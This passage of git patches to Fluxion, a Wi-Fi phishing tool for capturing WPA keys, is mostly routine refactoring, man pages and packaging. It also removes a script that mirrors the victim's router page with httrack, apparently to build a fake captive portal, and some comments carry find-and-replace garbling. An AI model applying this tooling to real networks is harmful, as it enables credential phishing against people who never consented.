"\n\n" +echo -ne "\n" -echo "[ System Info ]" -if [ -r "/proc/version" ]; then cat /proc/version -else uname -r +echo "$HEADER_SIZE System Info" +if [ -r "/proc/version" ]; then + echo "**Chipset:** $(cat /proc/version)" +else + echo "**Chipset:** $(uname -r)" fi diff --git a/scripts/router.sh b/scripts/router.sh deleted file mode 100755 index 0489105..0000000 --- a/scripts/router.sh +++ /dev/null @@ -1,70 +0,0 @@ -#!/bin/bash - -##################################### < CONFIGURATION > ##################################### - -gateway=$(ip route | grep default | awk '{print $3}') - -#Colors -white="\033[1;37m" -red="\033[1;31m" -blue="\033[1;34m" -transparent="\e[0m" - -############################################################################################# - -clear -echo -e "$red[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]" -echo -e "$red Prepare router page." -echo -e "$blue[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]""$transparent" -echo "[i] Prepare dep." - -# Check which package manager is installed -echo "Package Manager" -if hash pacman 2>/dev/null; then - PACK="pacman -S" -else - if hash apt-get 2>/dev/null; then - PACK="apt-get install" - else - if hash yum 2>/dev/null; then - PACK="yum install" - fi - fi -fi -sleep 0.025 -echo "=================================================================================" - -echo -ne "Httrack........." -if ! hash httrack 2>/dev/null; then - echo -e "\e[1;31mNot installed"$transparent"" - $PACK httrack -else - echo -e "\e[1;32mOK!"$transparent"" -fi -sleep 0.025 -echo "=================================================================================" - -echo -ne "cutycapt........" -if ! hash httrack 2>/dev/null; then - echo -e "\e[1;31mNot installed"$transparent"" - $PACK cutycapt -else - echo -e "\e[1;32mOK!"$transparent"" -fi -sleep 0.025 -echo "=================================================================================" - -if [ ! -d sites ]; then - mkdir sites -fi - -############################################################################################# -echo "[i] Download preview picture" -cutycapt --url=http://$gateway --out=sites/$(date | awk '{print $4}').png -echo "=================================================================================" - -cd sites -echo "[i] Download router site" -httrack $gateway -echo "=================================================================================" -echo "[I] DONE" From d1a5d666f4982e6e08d5c5d489230afc08e85d04 Mon Sep 17 00:00:00 2001 From: Erik Dubois Date: Wed, 31 Jan 2018 13:20:33 +0100 Subject: [PATCH 38/45] Fix #364 --- attacks/Captive Portal/attack.sh | 2 -- fluxion | 2 ++ 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index 1696c66..3f8d2ee 100755 --- a/attacks/Captive Portal/attack.sh +++ b/attacks/Captive Portal/attack.sh @@ -1090,8 +1090,6 @@ captive_portal_set_routes() { # Activate system IPV4 packet routing/forwarding. sysctl -w net.ipv4.ip_forward=1 &>$FLUXIONOutputDevice - iptables-save >"$FLUXIONWorkspacePath/iptables-rules" - iptables --flush iptables --table nat --flush iptables --delete-chain diff --git a/fluxion b/fluxion index 13180a5..a93b14a 100755 --- a/fluxion +++ b/fluxion @@ -202,6 +202,8 @@ source "$FLUXIONPath/language/en.sh" fluxion_startup() { if [ "$FLUXIONDebug" ]; then return 1; fi + # Make sure that we save the iptable files + iptables-save >"$FLUXIONWorkspacePath/iptables-rules" local banner=() format_center_literals \ From ec094539b4e1fa5fd22e1ef83392f143f0835a6c Mon Sep 17 00:00:00 2001 From: Erik Dubois Date: Wed, 31 Jan 2018 13:53:13 +0100 Subject: [PATCH 39/45] Change preference file --- fluxion | 117 ++++++++++++++++++++++--------------------- preferences/.gitkeep | 0 2 files changed, 60 insertions(+), 57 deletions(-) create mode 100644 preferences/.gitkeep diff --git a/fluxion b/fluxion index a93b14a..72594ff 100755 --- a/fluxion +++ b/fluxion @@ -8,21 +8,24 @@ # the script, however, will be loaded correctly. # Path to directory containing the FLUXION executable script. -declare -r FLUXIONPath=$(cd "$(dirname "$0")"; pwd -P) +readonly FLUXIONPath=$(cd "$(dirname "$0")"; pwd -P) # Path to the temp. directory available to FLUXION & subscripts. -declare -r FLUXIONWorkspacePath="/tmp/fluxspace" +readonly FLUXIONWorkspacePath="/tmp/fluxspace" # Path to FLUXION's preferences file, to be loaded afterward. -declare -r FLUXIONPreferencesFile="$FLUXIONPath/preferences.conf" +readonly FLUXIONLanguagePreferencesFile="$FLUXIONPath/preferences/LanguagePreference.conf" # Constants denoting the reference noise floor & ceiling levels. # These are used by the the wireless network scanner visualizer. -declare -r FLUXIONNoiseFloor=-90 -declare -r FLUXIONNoiseCeiling=-60 +readonly FLUXIONNoiseFloor=-90 +readonly FLUXIONNoiseCeiling=-60 -declare -r FLUXIONVersion=4 -declare -r FLUXIONRevision=1 +readonly FLUXIONVersion=4 +readonly FLUXIONRevision=2 + +# Declare window ration bigger = smaller windows +FLUXIONWindowRatio=4 # ============================================================ # @@ -79,14 +82,14 @@ source lib/HashUtils.sh # ============================================================ # if ! FLUXIONCLIArguments=$( getopt --options="vdkrnmtb:e:c:l:a:" \ - --longoptions="debug,version,killer,reloader,airmon-ng,multiplexer,target,test,bssid:,essid:,channel:,language:,attack:" \ + --longoptions="debug,version,killer,reloader,ratio,airmon-ng,multiplexer,target,test,bssid:,essid:,channel:,language:,attack:" \ --name="FLUXION V$FLUXIONVersion.$FLUXIONRevision" -- "$@" ); then echo -e "${CRed}Aborted$CClr, parameter error detected..."; exit 5 fi AttackCLIArguments=${FLUXIONCLIArguments##*--} -declare -r FLUXIONCLIArguments=${FLUXIONCLIArguments%%--*} +readonly FLUXIONCLIArguments=${FLUXIONCLIArguments%%--*} # ============================================================ # @@ -96,17 +99,18 @@ declare -r FLUXIONCLIArguments=${FLUXIONCLIArguments%%--*} # ============= < Argument Loaded Configurables > ============ # eval set -- "$FLUXIONCLIArguments" # Set environment parameters. -[ "$1" != "" ] && declare -r FLUXIONAuto=1 # Auto-mode if using CLI. +#[ "$1" != "" ] && readonly FLUXIONAuto=1 # Auto-mode if using CLI. while [ "$1" != "" -a "$1" != "--" ]; do case "$1" in -v|--version) echo "FLUXION V$FLUXIONVersion.$FLUXIONRevision"; exit;; - -d|--debug) declare -r FLUXIONDebug=1;; - -k|--killer) declare -r FLUXIONWIKillProcesses=1;; - -r|--reloader) declare -r FLUXIONWIReloadDriver=1;; - -n|--airmon-ng) declare -r FLUXIONAirmonNG=1;; - -m|--multiplexer) declare -r FLUXIONTMux=1;; + -d|--debug) readonly FLUXIONDebug=1;; + -k|--killer) readonly FLUXIONWIKillProcesses=1;; + -r|--reloader) readonly FLUXIONWIReloadDriver=1;; + -n|--airmon-ng) readonly FLUXIONAirmonNG=1;; + -m|--multiplexer) readonly FLUXIONTMux=1;; -b|--bssid) FluxionTargetMAC=$2; shift;; + --ratio) FLUXIONWindowRatio=$2;shift;; -e|--essid) FluxionTargetSSID=$2; FluxionTargetSSIDClean=$( echo "$FluxionTargetSSID" | sed -r 's/( |\/|\.|\~|\\)+/_/g' @@ -126,67 +130,67 @@ shift # Remove "--" to prepare for attacks to read parameters. # Load user-defined preferences if there's an executable script. # If no script exists, prepare one for the user to store config. # WARNING: Preferences file must assure no redeclared constants. -if [ -x "$FLUXIONPreferencesFile" ]; then - source "$FLUXIONPreferencesFile" +if [ -x "$FLUXIONLanguagePreferencesFile" ]; then + source "$FLUXIONLanguagePreferencesFile" else - echo '#!/bin/bash' > "$FLUXIONPreferencesFile" - chmod u+x "$FLUXIONPreferencesFile" + echo '#!/bin/bash' > "$FLUXIONLanguagePreferencesFile" + chmod u+x "$FLUXIONLanguagePreferencesFile" fi # ================ < Configurable Constants > ================ # if [ "$FLUXIONAuto" != "1" ]; then # If defined, assure 1. - declare -r FLUXIONAuto=${FLUXIONAuto:+1} + readonly FLUXIONAuto=${FLUXIONAuto:+1} fi if [ "$FLUXIONDebug" != "1" ]; then # If defined, assure 1. - declare -r FLUXIONDebug=${FLUXIONDebug:+1} + readonly FLUXIONDebug=${FLUXIONDebug:+1} fi if [ "$FLUXIONAirmonNG" != "1" ]; then # If defined, assure 1. - declare -r FLUXIONAirmonNG=${FLUXIONAirmonNG:+1} + readonly FLUXIONAirmonNG=${FLUXIONAirmonNG:+1} fi if [ "$FLUXIONWIKillProcesses" != "1" ]; then # If defined, assure 1. - declare -r FLUXIONWIKillProcesses=${FLUXIONWIKillProcesses:+1} + readonly FLUXIONWIKillProcesses=${FLUXIONWIKillProcesses:+1} fi if [ "$FLUXIONWIReloadDriver" != "1" ]; then # If defined, assure 1. - declare -r FLUXIONWIReloadDriver=${FLUXIONWIReloadDriver:+1} + readonly FLUXIONWIReloadDriver=${FLUXIONWIReloadDriver:+1} fi # FLUXIONDebug [Normal Mode "" / Developer Mode 1] if [ $FLUXIONDebug ]; then - declare -r FLUXIONOutputDevice="/dev/stdout" - declare -r FLUXIONHoldXterm="-hold" + readonly FLUXIONOutputDevice="/dev/stdout" + readonly FLUXIONHoldXterm="-hold" else - declare -r FLUXIONOutputDevice="/dev/null" - declare -r FLUXIONHoldXterm="" + readonly FLUXIONOutputDevice="/dev/null" + readonly FLUXIONHoldXterm="" fi # ================ < Configurable Variables > ================ # -declare -r FLUXIONPromptDefault="$CRed[${CSBlu}fluxion$CSYel@$CSWht$HOSTNAME$CClr$CRed]-[$CSYel~$CClr$CRed]$CClr " +readonly FLUXIONPromptDefault="$CRed[${CSBlu}fluxion$CSYel@$CSWht$HOSTNAME$CClr$CRed]-[$CSYel~$CClr$CRed]$CClr " FLUXIONPrompt=$FLUXIONPromptDefault -declare -r FLUXIONVLineDefault="$CRed[$CSYel*$CClr$CRed]$CClr" +readonly FLUXIONVLineDefault="$CRed[$CSYel*$CClr$CRed]$CClr" FLUXIONVLine=$FLUXIONVLineDefault # ================== < Library Parameters > ================== # -declare -r InterfaceUtilsOutputDevice="$FLUXIONOutputDevice" +readonly InterfaceUtilsOutputDevice="$FLUXIONOutputDevice" -declare -r SandboxWorkspacePath="$FLUXIONWorkspacePath" -declare -r SandboxOutputDevice="$FLUXIONOutputDevice" +readonly SandboxWorkspacePath="$FLUXIONWorkspacePath" +readonly SandboxOutputDevice="$FLUXIONOutputDevice" -declare -r InstallerUtilsWorkspacePath="$FLUXIONWorkspacePath" -declare -r InstallerUtilsOutputDevice="$FLUXIONOutputDevice" -declare -r InstallerUtilsNoticeMark="$FLUXIONVLine" +readonly InstallerUtilsWorkspacePath="$FLUXIONWorkspacePath" +readonly InstallerUtilsOutputDevice="$FLUXIONOutputDevice" +readonly InstallerUtilsNoticeMark="$FLUXIONVLine" -declare -r PackageManagerLog="$InstallerUtilsWorkspacePath/package_manager.log" +readonly PackageManagerLog="$InstallerUtilsWorkspacePath/package_manager.log" declare IOUtilsHeader="fluxion_header" -declare -r IOUtilsQueryMark="$FLUXIONVLine" -declare -r IOUtilsPrompt="$FLUXIONPrompt" +readonly IOUtilsQueryMark="$FLUXIONVLine" +readonly IOUtilsPrompt="$FLUXIONPrompt" -declare -r HashOutputDevice="$FLUXIONOutputDevice" +readonly HashOutputDevice="$FLUXIONOutputDevice" # ============================================================ # @@ -418,30 +422,29 @@ trap fluxion_handle_exit SIGINT SIGHUP # =============== < Resolution & Positioning > =============== # # ============================================================ # fluxion_set_resolution() { # Windows + Resolution - # Calc options - RATIO=4 - # Get demensions + # Get dimensions SCREEN_SIZE=$(xdpyinfo | grep dimension | awk '{print $4}' | tr -d "(") SCREEN_SIZE_X=$(printf '%.*f\n' 0 $(echo $SCREEN_SIZE | sed -e s'/x/ /'g | awk '{print $1}')) SCREEN_SIZE_Y=$(printf '%.*f\n' 0 $(echo $SCREEN_SIZE | sed -e s'/x/ /'g | awk '{print $2}')) + # Calculate proportional windows PROPOTION=$(echo $(awk "BEGIN {print $SCREEN_SIZE_X/$SCREEN_SIZE_Y}")/1 | bc) - NEW_SCREEN_SIZE_X=$(echo $(awk "BEGIN {print $SCREEN_SIZE_X/$RATIO}")/1 | bc) - NEW_SCREEN_SIZE_Y=$(echo $(awk "BEGIN {print $SCREEN_SIZE_Y/$RATIO}")/1 | bc) + NEW_SCREEN_SIZE_X=$(echo $(awk "BEGIN {print $SCREEN_SIZE_X/$FLUXIONWindowRatio}")/1 | bc) + NEW_SCREEN_SIZE_Y=$(echo $(awk "BEGIN {print $SCREEN_SIZE_Y/$FLUXIONWindowRatio}")/1 | bc) - NEW_SCREEN_SIZE_BIG_X=$(echo $(awk "BEGIN {print 1.5*$SCREEN_SIZE_X/$RATIO}")/1 | bc) - NEW_SCREEN_SIZE_BIG_Y=$(echo $(awk "BEGIN {print 1.5*$SCREEN_SIZE_Y/$RATIO}")/1 | bc) + NEW_SCREEN_SIZE_BIG_X=$(echo $(awk "BEGIN {print 1.5*$SCREEN_SIZE_X/$FLUXIONWindowRatio}")/1 | bc) + NEW_SCREEN_SIZE_BIG_Y=$(echo $(awk "BEGIN {print 1.5*$SCREEN_SIZE_Y/$FLUXIONWindowRatio}")/1 | bc) SCREEN_SIZE_MID_X=$(echo $(($SCREEN_SIZE_X + ($SCREEN_SIZE_X - 2 * $NEW_SCREEN_SIZE_X) / 2))) SCREEN_SIZE_MID_Y=$(echo $(($SCREEN_SIZE_Y + ($SCREEN_SIZE_Y - 2 * $NEW_SCREEN_SIZE_Y) / 2))) - # Upper + # Upper windows TOPLEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0+0" TOPRIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0+0" TOP="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+$SCREEN_SIZE_MID_X+0" - # Lower + # Lower windows BOTTOMLEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0-0" BOTTOMRIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0-0" BOTTOM="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+$SCREEN_SIZE_MID_X-0" @@ -542,7 +545,7 @@ fluxion_do_sequence() { if [ ${#@} -ne 2 ]; then return -1; fi # TODO: Implement an alternative, better method of doing - # what this subroutine does, maybe using for-loop iteration. + # what this subroutine does, maybe using for-loop iteFLUXIONWindowRation. # The for-loop implementation must support the subroutines # defined above, including updating the namespace tracker. @@ -618,8 +621,8 @@ fluxion_header() { fluxion_unset_language() { FluxionLanguage="" - if [ "$FLUXIONPreferencesFile" ]; then - sed -i.backup "/FluxionLanguage=.\+/ d" "$FLUXIONPreferencesFile" + if [ "$FLUXIONLanguagePreferencesFile" ]; then + sed -i.backup "/FluxionLanguage=.\+/ d" "$FLUXIONLanguagePreferencesFile" fi } @@ -661,13 +664,13 @@ fluxion_set_language() { source "$FLUXIONPath/language/$FluxionLanguage.sh" - if [ "$FLUXIONPreferencesFile" ]; then - if more $FLUXIONPreferencesFile | \ + if [ "$FLUXIONLanguagePreferencesFile" ]; then + if more $FLUXIONLanguagePreferencesFile | \ grep -q "FluxionLanguage=.\+" &> /dev/null; then sed -r "s/FluxionLanguage=.+/FluxionLanguage=$FluxionLanguage/g" \ - -i.backup "$FLUXIONPreferencesFile" + -i.backup "$FLUXIONLanguagePreferencesFile" else - echo "FluxionLanguage=$FluxionLanguage" >> "$FLUXIONPreferencesFile" + echo "FluxionLanguage=$FluxionLanguage" >> "$FLUXIONLanguagePreferencesFile" fi fi } @@ -1013,7 +1016,7 @@ fluxion_target_get_candidates() { return 3 fi - # Syntheize scan operation results from output file "dump-01.csv." + # Syntheize scan opeFLUXIONWindowRation results from output file "dump-01.csv." echo -e "$FLUXIONVLine $FLUXIONPreparingScannerResultsNotice" # WARNING: The code below may break with different version of airmon-ng. # The times matching operator "{n}" isn't supported by mawk (alias awk). diff --git a/preferences/.gitkeep b/preferences/.gitkeep new file mode 100644 index 0000000..e69de29 From 488818edc4cd4053e0f0df1e87affa97654e5c80 Mon Sep 17 00:00:00 2001 From: Erik Dubois Date: Wed, 31 Jan 2018 14:57:43 +0100 Subject: [PATCH 40/45] Add man page --- docs/man/fluxion.man | 60 ++++++++++++++++++++++++++++++++++++++++++++ fluxion | 10 +++++--- 2 files changed, 67 insertions(+), 3 deletions(-) create mode 100644 docs/man/fluxion.man diff --git a/docs/man/fluxion.man b/docs/man/fluxion.man new file mode 100644 index 0000000..29e624b --- /dev/null +++ b/docs/man/fluxion.man @@ -0,0 +1,60 @@ +FLUXION(1) User Manuals FLUXION(1) + + +NAME + fluxion - Fluxion is a security auditing and social-engineering + research tool + +SYNOPSIS + fluxion + fluxion -a [attack] -e [essid] -b [bssid] -- -j ... + +DESCRIPTION + Fluxion is a security auditing and social-engineering research tool. + It is a remake of linset by vk496 with (hopefully) less bugs + and more functionality. The script attempts to retrieve the WPA/WPA2 + key from a target access point by means of a social engineering + (phising) attack. It's compatible with the latest release of Kali + (rolling). Fluxion's attacks' setup is mostly manual, + but experimental auto-mode handles some of the attacks' + setup parameters. + +OPTIONS + -a : Give a certain attack + -e : Give a certain essid + -b : Give a certain bssid + -- : Marker is required + -j : Give a certain jamming interface + -a : Give a certain access point interface + -x : Use xterm instead of tmux + -v : Print version number + -d : Run fluxion in debug mode + -k : Kill wireless connection if it is connected + -m : Run fluxion in manual mode instead of auto + -l : Give a certain language + --help : Print help page + + ./fluxion -a [ATTACK] -e [ESSID] -b [BSSID] -c [CHANNEL] \ + -- -a [AP INTERFACE] -j [JAMMING INTERFACE] + +FILES + $HOME/fluxion/attack/* + /tmp/fluxspace/* + +.DIAGNOSTICS + The following diagnostics may be issued on stderr: + + Please checkout the other log files for more details or check + debug mode. + +BUGS + Please report any bugs at: + https://github.com/FluxionNetwork/fluxion/issues + +AUTHOR + Cyberfee, l3op, dlinkproto, vk496, MPX4132 + +SEE ALSO + aircrack-ng(8) + +Linux Last change: MARCH 2018 2 diff --git a/fluxion b/fluxion index 72594ff..9e24cf2 100755 --- a/fluxion +++ b/fluxion @@ -27,6 +27,9 @@ readonly FLUXIONRevision=2 # Declare window ration bigger = smaller windows FLUXIONWindowRatio=4 +# Print help if it is true +FluxionHelpTrue=false + # ============================================================ # # ================= < Script Sanity Checks > ================= # @@ -73,16 +76,16 @@ source lib/FormatUtils.sh source lib/ColorUtils.sh source lib/IOUtils.sh source lib/HashUtils.sh +source lib/Help.sh # NOTE: These are configured after arguments are loaded (later). - # ============================================================ # # =================== < Parse Parameters > =================== # # ============================================================ # if ! FLUXIONCLIArguments=$( - getopt --options="vdkrnmtb:e:c:l:a:" \ - --longoptions="debug,version,killer,reloader,ratio,airmon-ng,multiplexer,target,test,bssid:,essid:,channel:,language:,attack:" \ + getopt --options="vdkrnmtbh:e:c:l:a:h:r" \ + --longoptions="debug,version,killer,reloader,ratio,help,airmon-ng,multiplexer,target,test,bssid:,essid:,channel:,language:,attack:" \ --name="FLUXION V$FLUXIONVersion.$FLUXIONRevision" -- "$@" ); then echo -e "${CRed}Aborted$CClr, parameter error detected..."; exit 5 @@ -104,6 +107,7 @@ eval set -- "$FLUXIONCLIArguments" # Set environment parameters. while [ "$1" != "" -a "$1" != "--" ]; do case "$1" in -v|--version) echo "FLUXION V$FLUXIONVersion.$FLUXIONRevision"; exit;; + -h|--help) fluxion_help; exit;; -d|--debug) readonly FLUXIONDebug=1;; -k|--killer) readonly FLUXIONWIKillProcesses=1;; -r|--reloader) readonly FLUXIONWIReloadDriver=1;; From b8e948039d797a653bcb9e7cebe23f637cb4edb1 Mon Sep 17 00:00:00 2001 From: Erik Dubois Date: Wed, 31 Jan 2018 18:28:38 +0100 Subject: [PATCH 41/45] Minor man page tweaks --- docs/man/fluxion.1 | 76 ++++++++++++++++++++++++++++++ docs/man/fluxion.man | 110 ++++++++++++++++++++++++++++--------------- 2 files changed, 147 insertions(+), 39 deletions(-) create mode 100644 docs/man/fluxion.1 diff --git a/docs/man/fluxion.1 b/docs/man/fluxion.1 new file mode 100644 index 0000000..bdd5454 --- /dev/null +++ b/docs/man/fluxion.1 @@ -0,0 +1,76 @@ +.TH FLUXION 1 "MARCH 2018" Linux "User Manuals" +.SH NAME +fluxion \- Fluxion is a security auditing and social-engineering research tool +.SH SYNOPSIS +.B fluxion [-debug] [-l +.I language +.B ] +.I attack +.B ... +.SH DESCRIPTION +.B fluxion is a security auditing and social-engineering research tool. +It is a remake of linset by vk496 with (hopefully) less bugs +and more functionality. The script attempts to retrieve the WPA/WPA2 +key from a target access point by means of a social engineering +(phising) attack. It's compatible with the latest release of Kali +(rolling). Fluxion's attacks' setup is mostly manual, +but experimental auto-mode handles some of the attacks' +setup parameters. +.SH OPTIONS +.IP "-v " +Print version number. +.IP "--help " +Print help page and exit with 0. +.IP "-m " +Run fluxion in manual mode instead of auto mode. +.IP "-k " +Kill wireless connection if it is connected. +.IP "-d " +Run fluxion in debug mode. +.IP "-x " +Try to run fluxion with xterm terminals instead of tmux. +.IP "-r " +Reload driver. +.IP "-l " +Define a certain language. +.IP "-e " +Select the target network based on the ESSID. +.IP "-c " +Indicate the channel(s) to listen to. +.IP "-a " +Define a certain attack. +.IP "--ratio " +Define the windows size. Bigger ratio -> smaller window size. +Default is 4. +.IP "-b " +Select the target network based on the access point MAC address. +.IP "-j " +Define a certain jamming interface. +.IP "-a " +Define a certain access point interface. +.SH FILES +.I /tmp/fluxspace/ +.RS +The system wide tmp directory. +.RE +.I $FLUXION/attacks/ +.RS +Folder where handshakes and passwords +are stored in. +.SH ENVIRONMENT +.IP FLUXIONAuto +Automatically run fluxion in auto mode if exported. +.IP FLUXIONDebug +Automatically run fluxion in debug mode if exported. +.IP FLUXIONWIKillProcesses +Automatically kill any interfering process(es). +.SH DIAGNOSTICS +Please checkout the other log files or use +the debug mode. +.SH BUGS +Please report any bugs at: +https://github.com/FluxionNetwork/fluxion/issues +.SH AUTHOR +Cyberfee, l3op, dlinkproto, vk496, MPX4132 +.SH "SEE ALSO" +.BR aircrack-ng (8), diff --git a/docs/man/fluxion.man b/docs/man/fluxion.man index 29e624b..65fe62e 100644 --- a/docs/man/fluxion.man +++ b/docs/man/fluxion.man @@ -1,60 +1,92 @@ -FLUXION(1) User Manuals FLUXION(1) +FLUXION(1) User Manuals FLUXION(1) + NAME - fluxion - Fluxion is a security auditing and social-engineering - research tool + fluxion - Fluxion is a security auditing and social-engineering + research tool SYNOPSIS - fluxion - fluxion -a [attack] -e [essid] -b [bssid] -- -j ... + fluxion [-debug] [-l language ] attack ... DESCRIPTION - Fluxion is a security auditing and social-engineering research tool. - It is a remake of linset by vk496 with (hopefully) less bugs - and more functionality. The script attempts to retrieve the WPA/WPA2 - key from a target access point by means of a social engineering - (phising) attack. It's compatible with the latest release of Kali - (rolling). Fluxion's attacks' setup is mostly manual, - but experimental auto-mode handles some of the attacks' - setup parameters. + fluxion is a security auditing and social-engineering research tool. + It is a remake of linset by vk496 with (hopefully) less bugs and more + functionality. The script attempts to retrieve the WPA/WPA2 key from a + target access point by means of a social engineering (phising) attack. + It's compatible with the latest release of Kali (rolling). Fluxion's + attacks' setup is mostly manual, but experimental auto-mode handles + some of the attacks' setup parameters. OPTIONS - -a : Give a certain attack - -e : Give a certain essid - -b : Give a certain bssid - -- : Marker is required - -j : Give a certain jamming interface - -a : Give a certain access point interface - -x : Use xterm instead of tmux - -v : Print version number - -d : Run fluxion in debug mode - -k : Kill wireless connection if it is connected - -m : Run fluxion in manual mode instead of auto - -l : Give a certain language - --help : Print help page + -v Print version number. - ./fluxion -a [ATTACK] -e [ESSID] -b [BSSID] -c [CHANNEL] \ - -- -a [AP INTERFACE] -j [JAMMING INTERFACE] + --help Print help page and exit with 0. + + -m Run fluxion in manual mode instead of auto mode. + + -k Kill wireless connection if it is connected. + + -d Run fluxion in debug mode. + + -x Try to run fluxion with xterm terminals instead of tmux. + + -r Reload driver. + + -l + Define a certain language. + + -e + Select the target network based on the ESSID. + + -c + Indicate the channel(s) to listen to. + + -a + Define a certain attack. + + --ratio + Define the windows size. Bigger ratio -> smaller window size. + Default is 4. + + -b + Select the target network based on the access point MAC address. + + -j + Define a certain jamming interface. + + -a + Define a certain access point interface. FILES - $HOME/fluxion/attack/* - /tmp/fluxspace/* + /tmp/fluxspace/ + The system wide tmp directory. + $FLUXION/attacks/ + Folder where handshakes and passwords are stored in. -.DIAGNOSTICS - The following diagnostics may be issued on stderr: +ENVIRONMENT + FLUXIONAuto + Automatically run fluxion in auto mode if exported. - Please checkout the other log files for more details or check - debug mode. + FLUXIONDebug + Automatically run fluxion in debug mode if exported. + + FLUXIONWIKillProcesses + Automatically kill any interfering process(es). + +DIAGNOSTICS + Please checkout the other log files or use the debug mode. BUGS - Please report any bugs at: - https://github.com/FluxionNetwork/fluxion/issues + Please report any bugs at: https://github.com/FluxionNetwork/flux- + ion/issues AUTHOR - Cyberfee, l3op, dlinkproto, vk496, MPX4132 + Cyberfee, l3op, dlinkproto, vk496, MPX4132 SEE ALSO - aircrack-ng(8) + aircrack-ng(8), -Linux Last change: MARCH 2018 2 + + +Linux MARCH 2018 FLUXION(1) \ No newline at end of file From 46a8114a3bbfea4ce369f469e17206fc1b65793d Mon Sep 17 00:00:00 2001 From: Erik Dubois Date: Thu, 1 Feb 2018 16:22:40 +0100 Subject: [PATCH 42/45] Add build option for arch linux --- attacks/Captive Portal/attack.sh | 5 +-- bin/arch/PKGBUILD | 66 ++++++++++++++++++++++++++++++++ fluxion | 31 +++++++++------ 3 files changed, 88 insertions(+), 14 deletions(-) create mode 100644 bin/arch/PKGBUILD diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index 3f8d2ee..b7636dc 100755 --- a/attacks/Captive Portal/attack.sh +++ b/attacks/Captive Portal/attack.sh @@ -1055,10 +1055,9 @@ captive_portal_generic() { } captive_portal_unset_routes() { - if [ -f "$FLUXIONWorkspacePath/iptables-rules" ]; then - iptables-restore <"$FLUXIONWorkspacePath/iptables-rules" \ + if [ -f "$FLUXIONIPTablesBackup" ]; then + iptables-restore <"$FLUXIONIPTablesBackup" \ &> $FLUXIONOutputDevice - sandbox_remove_workfile "$FLUXIONWorkspacePath/iptables-rules" else iptables --flush iptables --table nat --flush diff --git a/bin/arch/PKGBUILD b/bin/arch/PKGBUILD new file mode 100644 index 0000000..3640785 --- /dev/null +++ b/bin/arch/PKGBUILD @@ -0,0 +1,66 @@ +# Maintainer: Cyberfee + +_pkgname=fluxion +pkgname=$_pkgname-git +pkgver=r1183.63b821f +pkgrel=1 +pkgdesc='Fluxion is a security auditing and social-engineering research tool' +url='https://github.com/FluxionNetwork/fluxion' +license=('GPL3') +source=('git://github.com/FluxionNetwork/fluxion.git#branch=master') + +depends=( + 'aircrack-ng' 'bash>=4.2' 'coreutils' + 'awk' 'iw' 'unzip' + 'curl' 'bc' 'xterm' +) + +makedepends=('binutils' 'coreutils' 'git') +conflicts=('fluxion-git') +provides=('fluxion-git') +sha256sums=('SKIP') +arch=('any') + +prepare() { + if [ -d "$srcdir/$pkgname" ]; then + rm -rf "$srcdir/$pkgname" + fi + + mkdir -p "$srcdir/$pkgname" + cd "$srcdir/$pkgname" +} + +pkgver() { + cd "$srcdir/$_pkgname" + + ( set -o pipefail + git describe --long 2>/dev/null | sed 's/\([^-]*-g\)/r\1/;s/-/./g' || + printf "r%s.%s" "$(git rev-list --count HEAD)" "$(git rev-parse --short HEAD)" + ) +} + +prepare() { + cd "$srcdir/$_pkgname" +} + +package() { + cd "$srcdir/$_pkgname" + + mkdir -p "$pkgdir/usr/bin" + mkdir -p "$pkgdir/usr/share/fluxion" + + install -Dm644 -t "$pkgdir/usr/share/doc/fluxion/" README.md + install -Dm644 LICENSE "$pkgdir/usr/share/licenses/airgeddon/LICENSE" + + rm -rf *.md .git* *.yml .project .editorconfig + + cp -a --no-preserve=ownership * "$pkgdir/usr/share/fluxion" + + cat > "$pkgdir/usr/bin/fluxion" << EOF +#!/bin/sh +cd /usr/share/fluxion +exec bash fluxion.sh "\${@}" +EOF + + chmod a+x "$pkgdir/usr/bin/fluxion" +} \ No newline at end of file diff --git a/fluxion b/fluxion index 9e24cf2..cf44983 100755 --- a/fluxion +++ b/fluxion @@ -12,6 +12,7 @@ readonly FLUXIONPath=$(cd "$(dirname "$0")"; pwd -P) # Path to the temp. directory available to FLUXION & subscripts. readonly FLUXIONWorkspacePath="/tmp/fluxspace" +readonly FLUXIONIPTablesBackup="$FLUXIONPath/iptables-rules" # Path to FLUXION's preferences file, to be loaded afterward. readonly FLUXIONLanguagePreferencesFile="$FLUXIONPath/preferences/LanguagePreference.conf" @@ -22,15 +23,11 @@ readonly FLUXIONNoiseFloor=-90 readonly FLUXIONNoiseCeiling=-60 readonly FLUXIONVersion=4 -readonly FLUXIONRevision=2 +readonly FLUXIONRevision=3 # Declare window ration bigger = smaller windows FLUXIONWindowRatio=4 -# Print help if it is true -FluxionHelpTrue=false - - # ============================================================ # # ================= < Script Sanity Checks > ================= # # ============================================================ # @@ -102,8 +99,7 @@ readonly FLUXIONCLIArguments=${FLUXIONCLIArguments%%--*} # ============= < Argument Loaded Configurables > ============ # eval set -- "$FLUXIONCLIArguments" # Set environment parameters. -#[ "$1" != "" ] && readonly FLUXIONAuto=1 # Auto-mode if using CLI. - +[ "$1" != "" ] && readonly FLUXIONAuto=1 # Auto-mode if using CLI. while [ "$1" != "" -a "$1" != "--" ]; do case "$1" in -v|--version) echo "FLUXION V$FLUXIONVersion.$FLUXIONRevision"; exit;; @@ -211,7 +207,7 @@ fluxion_startup() { if [ "$FLUXIONDebug" ]; then return 1; fi # Make sure that we save the iptable files - iptables-save >"$FLUXIONWorkspacePath/iptables-rules" + iptables-save >"$FLUXIONIPTablesBackup" local banner=() format_center_literals \ @@ -339,6 +335,17 @@ fluxion_shutdown() { done fi + echo -e "$CWht[$CRed-$CWht] $FLUXIONDisablingCleaningIPTablesNotice$CClr" + if [ -f "$FLUXIONIPTablesBackup" ]; then + iptables-restore 